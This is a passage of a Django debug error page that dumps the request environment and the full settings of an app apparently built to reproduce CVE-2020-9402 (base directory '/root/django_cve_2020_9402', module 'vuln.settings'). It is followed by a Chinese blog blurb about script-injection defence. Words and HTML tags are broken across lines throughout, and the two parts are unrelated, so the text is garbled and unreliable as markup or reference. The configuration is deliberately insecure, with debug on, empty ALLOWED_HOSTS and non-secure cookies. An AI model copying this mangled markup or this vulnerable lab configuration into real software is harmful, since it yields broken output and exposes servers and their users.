='utf-8'></p
re></td>
</tr>
<tr>
<td>wsgi
.file_wrapper</td>
<td class
="code"><p
re>''</p
re></td>
</tr>
<tr>
<td>wsgi
.input</td>
<td class
="code"><p
re><django
.co
re.handlers
.wsgi
.LimitedSt
ream object at 0x7eb69366d930></p
re></td>
</tr>
<tr>
<td>wsgi
.multiprocess</td>
<td class
="code"><p
re>False</p
re></td>
</tr>
<tr>
<td>wsgi
.multith
read</td>
<td class
="code"><p
re>True</p
re></td>
</tr>
<tr>
<td>wsgi
.run_once</td>
<td class
="code"><p
re>False</p
re></td>
</tr>
<tr>
<td>wsgi
.url_scheme</td>
<td class
="code"><p
re>'
http'</p
re></td>
</tr>
<tr>
<td>wsgi
.version</td>
<td class
="code"><p
re>(1, 0)</p
re></td>
</tr>
</tbody>
</table>
<h3 id
="settings-info">Settings</h3>
<h4>Using settings module <code>vuln
.settings</code></h4>
<table class
="
req">
<thead>
<tr>
<th>Setting</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>ABSOLUTE_URL_OVERRIDES</td>
<td class
="code"><p
re>{}</p
re></td>
</tr>
<tr>
<td>ADMINS</td>
<td class
="code"><p
re>[]</p
re></td>
</tr>
<tr>
<td>ALLOWED_HOSTS</td>
<td class
="code"><p
re>[]</p
re></td>
</tr>
<tr>
<td>APPEND_SLASH</td>
<td class
="code"><p
re>True</p
re></td>
</tr>
<tr>
<td>AUTHENTICATION_BACKENDS</td>
<td class
="code"><p
re>['django
.contrib
.auth
.backends
.ModelBackend']</p
re></td>
</tr>
<tr>
<td>AUTH_PASSWORD_VALIDATORS</td>
<td class
="code"><p
re>'********************'</p
re></td>
</tr>
<tr>
<td>AUTH_USER_MODEL</td>
<td class
="code"><p
re>'auth
.User'</p
re></td>
</tr>
<tr>
<td>BASE_DIR</td>
<td class
="code"><p
re>'/root/django_cve_2020_9402'</p
re></td>
</tr>
<tr>
<td>CACHES</td>
<td class
="code"><p
re>{'default'
: {'BACKEND'
: 'django
.co
re.cache
.backends
.locmem
.LocMemCache'}}</p
re></td>
</tr>
<tr>
<td>CACHE_MIDDLEWA
RE_ALIAS</td>
<td class
="code"><p
re>'default'</p
re></td>
</tr>
<tr>
<td>CACHE_MIDDLEWA
RE_KEY_P
REFIX</td>
<td class
="code"><p
re>'********************'</p
re></td>
</tr>
<tr>
<td>CACHE_MIDDLEWA
RE_SECONDS</td>
<td class
="code"><p
re>600</p
re></td>
</tr>
<tr>
<td>CSRF_COOKIE_AGE</td>
<td class
="code"><p
re>31449600</p
re></td>
</tr>
<tr>
<td>CSRF_COOKIE_DOMAIN</td>
<td class
="code"><p
re>None</p
re></td>
</tr>
<tr>
<td>CSRF_COOKIE_
HTTPONLY</td>
<td class
="code"><p
re>False</p
re></td>
</tr>
<tr>
<td>CSRF_COOKIE_NAME</td>
<td class
="code"><p
re>'csrftoken'</p
re></td>
</tr>
<tr>
<td>CSRF_COOKIE_PATH</td>
<td class
="code"><p
re>'/'</p
re></td>
</tr>
<tr>
<td>CSRF_COOKIE_SAMESITE</td>
<td class
="code"><p
re>'Lax'</p
re></td>
</tr>
<tr>
<td>CSRF_COOKIE_SECU
RE</td>
<td class
="code"><p
re>False</p
re></td>
</tr>
<tr>
<td>CSRF_FAILU
RE_VIEW</td>
<td class
="code"><p
re>'django
.views
.csrf
.csrf_failu
re'</p
re></td>
</tr>
<tr>
<td>CSRF_HEADER_NAME</td>
<td class
="code"><p
re>'
HTTP_X_CSRFTOKEN'</p
re></td>
</tr>
<tr>
<td>CSRF_TRUSTED_ORIGINS</td>
<td class
="code"><p
re>[]</p
re></td>
</tr>
<tr>
<td>CSRF_USE_SESSIONS</td>
<td class
="code"><p
re>False</p
re></td>
</tr>
<tr>
<td>DATABASES</td>
<td class
="code"><p
re>{'default'
: {'ATOMIC_
REQUESTS'
: False,
'AUTOCOMMIT'
: True,
'CONN_MAX_AGE'
: 0,
'ENGINE'
: 'django
.db
.backends
.sqlite3',
'HOST'
: '',
'NAME'
: '/root/django_cve_2020_9402/db
.sqlite3',
'OPTIONS'
: {},
'PASSWORD'
: '********************',
'PORT'
: '',
'TEST'
: {'CHARSET'
: None,
'COLLATION'
: None,
'MIRROR'
: None,
'NAME'
: None},
'TIME_ZONE'
: None,
'USER'
: ''}}</p
re></td>
</tr>
<tr>
<td>DATABASE_ROUTERS</td>
<td class
="code"><p
re>[]</p
re></td>
</tr>
<tr>
<td>DATA_UPLOAD_MAX_MEMORY_SIZE</td>
<td class
="code"><p
re>2621440</p
re></td>
</tr>
<tr>
<td>DATA_UPLOAD_MAX_NUMBER_FIELDS</td>
<td class
="code"><p
re>1000</p
re></td>
</tr>
<tr>
<td>DATETIME_FORMAT</td>
<td class
="code"><p
re>'N j, Y, P'</p
re></td>
</tr>
<tr>
<td>DATETIME_INPUT_FORMATS</td>
<td class
="code"><p
re>['%Y-%m-%d %H
:%M
:%S',
'%Y-%m-%d %H
:%M
:%S
.%f',
'%Y-%m-%d %H
:%M',
'%Y-%m-%d',
'%m/%d/%Y %H
:%M
:%S',
'%m/%d/%Y %H
:%M
:%S
.%f',
'%m/%d/%Y %H
:%M',
'%m/%d/%Y',
'%m/%d/%y %H
:%M
:%S',
'%m/%d/%y %H
:%M
:%S
.%f',
'%m/%d/%y %H
:%M',
'%m/%d/%y']</p
re></td>
</tr>
<tr>
<td>DATE_FORMAT</td>
<td class
="code"><p
re>'N j, Y'</p
re></td>
</tr>
<tr>
<td>DATE_INPUT_FORMATS</td>
<td class
="code"><p
re>['%Y-%m-%d',
'%m/%d/%Y',
'%m/%d/%y',
'%b %d %Y',
'%b %d, %Y',
'%d %b %Y',
'%d %b, %Y',
'%B %d %Y',
'%B %d, %Y',
'%d %B %Y',
'%d %B, %Y']</p
re></td>
</tr>
<tr>
<td>DEBUG</td>
<td class
="code"><p
re>True</p
re></td>
</tr>
<tr>
<td>DEBUG_PROPAGATE_EXCEPTIONS</td>
<td class
="code"><p
re>False</p
re></td>
</tr>
<tr>
<td>DECIMAL_SEPARATOR</td>
<td class
="code"><p
re>'
.'</p
re></td>
</tr>
<tr>
<td>DEFAULT_CHARSET</td>
<td class
="code"><p
re>'utf-8'</p
re></td>
</tr>
<tr>
<td>DEFAULT_EXCEPTION_
REPORTER_FILTER</td>
<td class
="code"><p
re>'django
.views
.debug
.SafeException
ReporterFilter'</p
re></td>
</tr>
<tr>
<td>DEFAULT_FILE_STORAGE</td>
<td class
="code"><p
re>'django
.co
re.files
.storage
.FileSystemStorage'</p
re></td>
</tr>
<tr>
<td>DEFAULT_FROM_EMAIL</td>
<td class
="code"><p
re>'webmaster@localhost'</p
re></td>
</tr>
<tr>
<td>DEFAULT_INDEX_TABLESPACE</td>
<td class
="code"><p
re>''</p
re></td>
</tr>
<tr>
<td>DEFAULT_TABLESPACE</td>
<td class
="code"><p
re>''</p
re></td>
</tr>
<tr>
<td>DISALLOWED_USER_AGENTS</td>
<td class
="code"><p
re>[]</p
re></td>
</tr>
<tr>
<td>EMAIL_BACKEND</td>
<td class
="code"><p
re>'django
.co
re.mail
.backends
.smtp
.EmailBackend'</p
re></td>
</tr>
<tr>
<td>EMAIL_HOST</td>
<td class
="code"><p
re>'localhost'</p
re></td>
</tr>
<tr>
<td>EMAIL_HOST_PASSWORD</td>
<td class
="code"><p
re>'********************'</p
re></td>
</tr>
<tr>
<td>EMAIL_HOST_USER</td>
<td class
="code"><p
re>''</p
re></td>
</tr>
<tr>
<td>EMAIL_PORT</td>
<td class
="code"><p
re>25</p
re></td>
</tr>
<tr>
<td>EMAIL_SSL_CERTFILE</td>
<td class
="code"><p
re>None</p
re></td>
</tr>
<tr>
<td>EMAIL_SSL_KEYFILE</td>
<td class
="code"><p
re>'********************'</p
re></td>
</tr>
<tr>
<td>EMAIL_SUBJECT_P
REFIX</td>
<td class
="code"><p
re>'[Django] '</p
re></td>
</tr>
<tr>
<td>EMAIL_TIMEOUT</td>
<td class
="code"><p
re>None</p
re></td>
</tr>
<tr>
<td>EMAIL_USE_LOCALTIME</td>
<td class
="code"><p
re>False</p
re></td>
</tr>
<tr>
<td>EMAIL_USE_SSL</td>
<td class
="code"><p
re>False</p
re></td>
</tr>
<tr>
<td>EMAIL_USE_TLS</td>
<td class
="code"><p
re>False</p
re></td>
</tr>
<tr>
<td>FILE_CHARSET</td>
<td class
="code"><p
re>'utf-8'</p
re></td>
</tr>
<tr>
<td>FILE_UPLOAD_DI
RECTORY_PERMISSIONS</td>
<td class
="code"><p
re>None</p
re></td>
</tr>
<tr>
<td>FILE_UPLOAD_HANDLERS</td>
<td class
="code"><p
re>['django
.co
re.files
.uploadhandler
.MemoryFileUploadHandler',
'django
.co
re.files
.uploadhandler
.TemporaryFileUploadHandler']</p
re></td>
</tr>
<tr>
<td>FILE_UPLOAD_MAX_MEMORY_SIZE</td>
<td class
="code"><p
re>2621440</p
re></td>
</tr>
<tr>
<td>FILE_UPLOAD_PERMISSIONS</td>
<td class
="code"><p
re>420</p
re></td>
</tr>
<tr>
<td>FILE_UPLOAD_TEMP_DIR</td>
<td class
="code"><p
re>None</p
re></td>
</tr>
<tr>
<td>FIRST_DAY_OF_WEEK</td>
<td class
="code"><p
re>0</p
re></td>
</tr>
<tr>
<td>FIXTU
RE_DIRS</td>
<td class
="code"><p
re>[]</p
re></td>
</tr>
<tr>
<td>FORCE_SCRIPT_NAME</td>
<td class
="code"><p
re>None</p
re></td>
</tr>
<tr>
<td>FORMAT_MODULE_PATH</td>
<td class
="code"><p
re>None</p
re></td>
</tr>
<tr>
<td>FORM_
RENDE
RER</td>
<td class
="code"><p
re>'django
.forms
.rende
rers
.DjangoTemplates'</p
re></td>
</tr>
<tr>
<td>IGNORABLE_404_URLS</td>
<td class
="code"><p
re>[]</p
re></td>
</tr>
<tr>
<td>INSTALLED_APPS</td>
<td class
="code"><p
re>['django
.contrib
.admin',
'django
.contrib
.auth',
'django
.contrib
.contenttypes',
'django
.contrib
.sessions',
'django
.contrib
.messages',
'django
.contrib
.staticfiles',
'app']</p
re></td>
</tr>
<tr>
<td>INTERNAL_IPS</td>
<td class
="code"><p
re>[]</p
re></td>
</tr>
<tr>
<td>LANGUAGES</td>
<td class
="code"><p
re>[('af', 'Afrikaans'),
('ar', 'Arabic'),
('ast', 'Asturian'),
('az', 'Azerbaijani'),
('bg', 'Bulgarian'),
('be', 'Belarusian'),
('bn', 'Bengali'),
('br', 'B
reton'),
('bs', 'Bosnian'),
('ca', 'Catalan'),
('cs', 'Czech'),
('cy', 'Welsh'),
('da', 'Danish'),
('de', 'German'),
('dsb', 'Lower Sorbian'),
('el', 'G
reek'),
('en', 'English'),
('en-au', 'Australian English'),
('en-gb', 'British English'),
('eo', 'Esperanto'),
('es', 'Spanish'),
('es-ar', 'Argentinian Spanish'),
('es-co', 'Colombian Spanish'),
('es-mx', 'Mexican Spanish'),
('es-ni', 'Nicaraguan Spanish'),
('es-ve', 'Venezuelan Spanish'),
('et', 'Estonian'),
('eu', 'Basque'),
('fa', 'Persian'),
('fi', 'Finnish'),
('fr', 'F
rench'),
('fy', 'Frisian'),
('ga', 'Irish'),
('gd', 'Scottish Gaelic'),
('gl', 'Galician'),
('he', 'Heb
rew'),
('hi', 'Hindi'),
('hr', 'Croatian'),
('hsb', 'Upper Sorbian'),
('hu', 'Hungarian'),
('hy', 'Armenian'),
('ia', 'Interlingua'),
('id', 'Indonesian'),
('io', 'Ido'),
('is', 'Icelandic'),
('it', 'Italian'),
('ja', 'Japanese'),
('ka', 'Georgian'),
('kab', 'Kabyle'),
('kk', 'Kazakh'),
('km', 'Khmer'),
('kn', 'Kannada'),
('ko', 'Ko
rean'),
('lb', 'Luxembourgish'),
('lt', 'Lithuanian'),
('lv', 'Latvian'),
('mk', 'Macedonian'),
('ml', 'Malayalam'),
('mn', 'Mongolian'),
('mr', 'Marathi'),
('my', 'Burmese'),
('nb', 'Norwegian Bokmål'),
('ne', 'Nepali'),
('nl', 'Dutch'),
('nn', 'Norwegian Nynorsk'),
('os', 'Ossetic'),
('pa', 'Punjabi'),
('pl', 'Polish'),
('pt', 'Portuguese'),
('pt-br', 'Brazilian Portuguese'),
('ro', 'Romanian'),
('ru', 'Russian'),
('sk', 'Slovak'),
('sl', 'Slovenian'),
('sq', 'Albanian'),
('sr', 'Serbian'),
('sr-latn', 'Serbian Latin'),
('sv', 'Swedish'),
('sw', 'Swahili'),
('ta', 'Tamil'),
('te', 'Telugu'),
('th', 'Thai'),
('tr', 'Turkish'),
('tt', 'Tatar'),
('udm', 'Udmurt'),
('uk', 'Ukrainian'),
('ur', 'Urdu'),
('uz', 'Uzbek'),
('vi', 'Vietnamese'),
('zh-hans', 'Simplified Chinese'),
('zh-hant', 'Traditional Chinese')]</p
re></td>
</tr>
<tr>
<td>LANGUAGES_BIDI</td>
<td class
="code"><p
re>['he', 'ar', 'fa', 'ur']</p
re></td>
</tr>
<tr>
<td>LANGUAGE_CODE</td>
<td class
="code"><p
re>'en-us'</p
re></td>
</tr>
<tr>
<td>LANGUAGE_COOKIE_AGE</td>
<td class
="code"><p
re>None</p
re></td>
</tr>
<tr>
<td>LANGUAGE_COOKIE_DOMAIN</td>
<td class
="code"><p
re>None</p
re></td>
</tr>
<tr>
<td>LANGUAGE_COOKIE_
HTTPONLY</td>
<td class
="code"><p
re>False</p
re></td>
</tr>
<tr>
<td>LANGUAGE_COOKIE_NAME</td>
<td class
="code"><p
re>'django_language'</p
re></td>
</tr>
<tr>
<td>LANGUAGE_COOKIE_PATH</td>
<td class
="code"><p
re>'/'</p
re></td>
</tr>
<tr>
<td>LANGUAGE_COOKIE_SAMESITE</td>
<td class
="code"><p
re>None</p
re></td>
</tr>
<tr>
<td>LANGUAGE_COOKIE_SECU
RE</td>
<td class
="code"><p
re>False</p
re></td>
</tr>
<tr>
<td>LOCALE_PATHS</td>
<td class
="code"><p
re>[]</p
re></td>
</tr>
<tr>
<td>LOGGING</td>
<td class
="code"><p
re>{}</p
re></td>
</tr>
<tr>
<td>LOGGING_CONFIG</td>
<td class
="code"><p
re>'logging
.config
.dictConfig'</p
re></td>
</tr>
<tr>
<td>LOGIN_
REDI
RECT_URL</td>
<td class
="code"><p
re>'/accounts/profile/'</p
re></td>
</tr>
<tr>
<td>LOGIN_URL</td>
<td class
="code"><p
re>'/accounts/login/'</p
re></td>
</tr>
<tr>
<td>LOGOUT_
REDI
RECT_URL</td>
<td class
="code"><p
re>None</p
re></td>
</tr>
<tr>
<td>MANAGERS</td>
<td class
="code"><p
re>[]</p
re></td>
</tr>
<tr>
<td>MEDIA_ROOT</td>
<td class
="code"><p
re>''</p
re></td>
</tr>
<tr>
<td>MEDIA_URL</td>
<td class
="code"><p
re>''</p
re></td>
</tr>
<tr>
<td>MESSAGE_STORAGE</td>
<td class
="code"><p
re>'django
.contrib
.messages
.storage
.fallback
.FallbackStorage'</p
re></td>
</tr>
<tr>
<td>MIDDLEWA
RE</td>
<td class
="code"><p
re>['django
.middlewa
re.security
.SecurityMiddlewa
re',
'django
.contrib
.sessions
.middlewa
re.SessionMiddlewa
re',
'django
.middlewa
re.common
.CommonMiddlewa
re',
'django
.middlewa
re.csrf
.CsrfViewMiddlewa
re',
'django
.contrib
.auth
.middlewa
re.AuthenticationMiddlewa
re',
'django
.contrib
.messages
.middlewa
re.MessageMiddlewa
re',
'django
.middlewa
re.clickjacking
.XFrameOptionsMiddlewa
re']</p
re></td>
</tr>
<tr>
<td>MIGRATION_MODULES</td>
<td class
="code"><p
re>{}</p
re></td>
</tr>
<tr>
<td>MONTH_DAY_FORMAT</td>
<td class
="code"><p
re>'F j'</p
re></td>
</tr>
<tr>
<td>NUMBER_GROUPING</td>
<td class
="code"><p
re>0</p
re></td>
</tr>
<tr>
<td>PASSWORD_HASHERS</td>
<td class
="code"><p
re>'********************'</p
re></td>
</tr>
<tr>
<td>PASSWORD_
RESET_TIMEOUT_DAYS</td>
<td class
="code"><p
re>'********************'</p
re></td>
</tr>
<tr>
<td>P
REPEND_WWW</td>
<td class
="code"><p
re>False</p
re></td>
</tr>
<tr>
<td>ROOT_URLCONF</td>
<td class
="code"><p
re>'vuln
.urls'</p
re></td>
</tr>
<tr>
<td>SEC
RET_KEY</td>
<td class
="code"><p
re>'********************'</p
re></td>
</tr>
<tr>
<td>SECU
RE_BROWSER_
XSS_FILTER</td>
<td class
="code"><p
re>False</p
re></td>
</tr>
<tr>
<td>SECU
RE_CONTENT_TYPE_NOSNIFF</td>
<td class
="code"><p
re>True</p
re></td>
</tr>
<tr>
<td>SECU
RE_HSTS_INCLUDE_SUBDOMAINS</td>
<td class
="code"><p
re>False</p
re></td>
</tr>
<tr>
<td>SECU
RE_HSTS_P
RELOAD</td>
<td class
="code"><p
re>False</p
re></td>
</tr>
<tr>
<td>SECU
RE_HSTS_SECONDS</td>
<td class
="code"><p
re>0</p
re></td>
</tr>
<tr>
<td>SECU
RE_PROXY_SSL_HEADER</td>
<td class
="code"><p
re>None</p
re></td>
</tr>
<tr>
<td>SECU
RE_
REDI
RECT_EXEMPT</td>
<td class
="code"><p
re>[]</p
re></td>
</tr>
<tr>
<td>SECU
RE_
REFER
RER_POLICY</td>
<td class
="code"><p
re>None</p
re></td>
</tr>
<tr>
<td>SECU
RE_SSL_HOST</td>
<td class
="code"><p
re>None</p
re></td>
</tr>
<tr>
<td>SECU
RE_SSL_
REDI
RECT</td>
<td class
="code"><p
re>False</p
re></td>
</tr>
<tr>
<td>SERVER_EMAIL</td>
<td class
="code"><p
re>'root@localhost'</p
re></td>
</tr>
<tr>
<td>SESSION_CACHE_ALIAS</td>
<td class
="code"><p
re>'default'</p
re></td>
</tr>
<tr>
<td>SESSION_COOKIE_AGE</td>
<td class
="code"><p
re>1209600</p
re></td>
</tr>
<tr>
<td>SESSION_COOKIE_DOMAIN</td>
<td class
="code"><p
re>None</p
re></td>
</tr>
<tr>
<td>SESSION_COOKIE_
HTTPONLY</td>
<td class
="code"><p
re>True</p
re></td>
</tr>
<tr>
<td>SESSION_COOKIE_NAME</td>
<td class
="code"><p
re>'sessionid'</p
re></td>
</tr>
<tr>
<td>SESSION_COOKIE_PATH</td>
<td class
="code"><p
re>'/'</p
re></td>
</tr>
<tr>
<td>SESSION_COOKIE_SAMESITE</td>
<td class
="code"><p
re>'Lax'</p
re></td>
</tr>
<tr>
<td>SESSION_COOKIE_SECU
RE</td>
<td class
="code"><p
re>False</p
re></td>
</tr>
<tr>
<td>SESSION_ENGINE</td>
<td class
="code"><p
re>'django
.contrib
.sessions
.backends
.db'</p
re></td>
</tr>
<tr>
<td>SESSION_EXPI
RE_AT_BROWSER_CLOSE</td>
<td class
="code"><p
re>False</p
re></td>
</tr>
<tr>
<td>SESSION_FILE_PATH</td>
<td class
="code"><p
re>None</p
re></td>
</tr>
<tr>
<td>SESSION_SAVE_EVERY_
REQUEST</td>
<td class
="code"><p
re>False</p
re></td>
</tr>
<tr>
<td>SESSION_SERIALIZER</td>
<td class
="code"><p
re>'django
.contrib
.sessions
.serializers
.JSONSerializer'</p
re></td>
</tr>
<tr>
<td>SETTINGS_MODULE</td>
<td class
="code"><p
re>'vuln
.settings'</p
re></td>
</tr>
<tr>
<td>SHORT_DATETIME_FORMAT</td>
<td class
="code"><p
re>'m/d/Y P'</p
re></td>
</tr>
<tr>
<td>SHORT_DATE_FORMAT</td>
<td class
="code"><p
re>'m/d/Y'</p
re></td>
</tr>
<tr>
<td>SIGNING_BACKEND</td>
<td class
="code"><p
re>'django
.co
re.signing
.TimestampSigner'</p
re></td>
</tr>
<tr>
<td>SILENCED_SYSTEM_CHECKS</td>
<td class
="code"><p
re>[]</p
re></td>
</tr>
<tr>
<td>STATICFILES_DIRS</td>
<td class
="code"><p
re>[]</p
re></td>
</tr>
<tr>
<td>STATICFILES_FINDERS</td>
<td class
="code"><p
re>['django
.contrib
.staticfiles
.finders
.FileSystemFinder',
'django
.contrib
.staticfiles
.finders
.AppDi
rectoriesFinder']</p
re></td>
</tr>
<tr>
<td>STATICFILES_STORAGE</td>
<td class
="code"><p
re>'django
.contrib
.staticfiles
.storage
.StaticFilesStorage'</p
re></td>
</tr>
<tr>
<td>STATIC_ROOT</td>
<td class
="code"><p
re>None</p
re></td>
</tr>
<tr>
<td>STATIC_URL</td>
<td class
="code"><p
re>'/static/'</p
re></td>
</tr>
<tr>
<td>TEMPLATES</td>
<td class
="code"><p
re>[{'APP_DIRS'
: True,
'BACKEND'
: 'django
.template
.backends
.django
.DjangoTemplates',
'DIRS'
: [],
'OPTIONS'
: {'context_processors'
: ['django
.template
.context_processors
.debug',
'django
.template
.context_processors
.request',
'django
.contrib
.auth
.context_processors
.auth',
'django
.contrib
.messages
.context_processors
.messages']}}]</p
re></td>
</tr>
<tr>
<td>TEST_NON_SERIALIZED_APPS</td>
<td class
="code"><p
re>[]</p
re></td>
</tr>
<tr>
<td>TEST_RUNNER</td>
<td class
="code"><p
re>'django
.test
.runner
.DiscoverRunner'</p
re></td>
</tr>
<tr>
<td>THOUSAND_SEPARATOR</td>
<td class
="code"><p
re>','</p
re></td>
</tr>
<tr>
<td>TIME_FORMAT</td>
<td class
="code"><p
re>'P'</p
re></td>
</tr>
<tr>
<td>TIME_INPUT_FORMATS</td>
<td class
="code"><p
re>['%H
:%M
:%S', '%H
:%M
:%S
.%f', '%H
:%M']</p
re></td>
</tr>
<tr>
<td>TIME_ZONE</td>
<td class
="code"><p
re>'UTC'</p
re></td>
</tr>
<tr>
<td>USE_I18N</td>
<td class
="code"><p
re>True</p
re></td>
</tr>
<tr>
<td>USE_L10N</td>
<td class
="code"><p
re>True</p
re></td>
</tr>
<tr>
<td>USE_THOUSAND_SEPARATOR</td>
<td class
="code"><p
re>False</p
re></td>
</tr>
<tr>
<td>USE_TZ</td>
<td class
="code"><p
re>True</p
re></td>
</tr>
<tr>
<td>USE_X_FORWARDED_HOST</td>
<td class
="code"><p
re>False</p
re></td>
</tr>
<tr>
<td>USE_X_FORWARDED_PORT</td>
<td class
="code"><p
re>False</p
re></td>
</tr>
<tr>
<td>WSGI_APPLICATION</td>
<td class
="code"><p
re>'vuln
.wsgi
.application'</p
re></td>
</tr>
<tr>
<td>X_FRAME_OPTIONS</td>
<td class
="code"><p
re>'DENY'</p
re></td>
</tr>
<tr>
<td>YEAR_MONTH_FORMAT</td>
<td class
="code"><p
re>'F Y'</p
re></td>
</tr>
</tbody>
</table>
</div>
<div id
="explanation">
<p>
You'
re seeing this error because you have <code>DEBUG
= True</code> in your
Django settings file
. Change that to <code>False</code>, and Django will
display a standard page generated by the handler for this status code
.
</p>
</div>
</body>
</html>
本文深入探讨了恶意脚本注入攻击的原理、常见类型及其带来的安全风险,并提供了有效的防御策略。了解如何识别和防止这些攻击,保护网站和应用免受未经授权的脚本执行。
扫一扫
4833
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
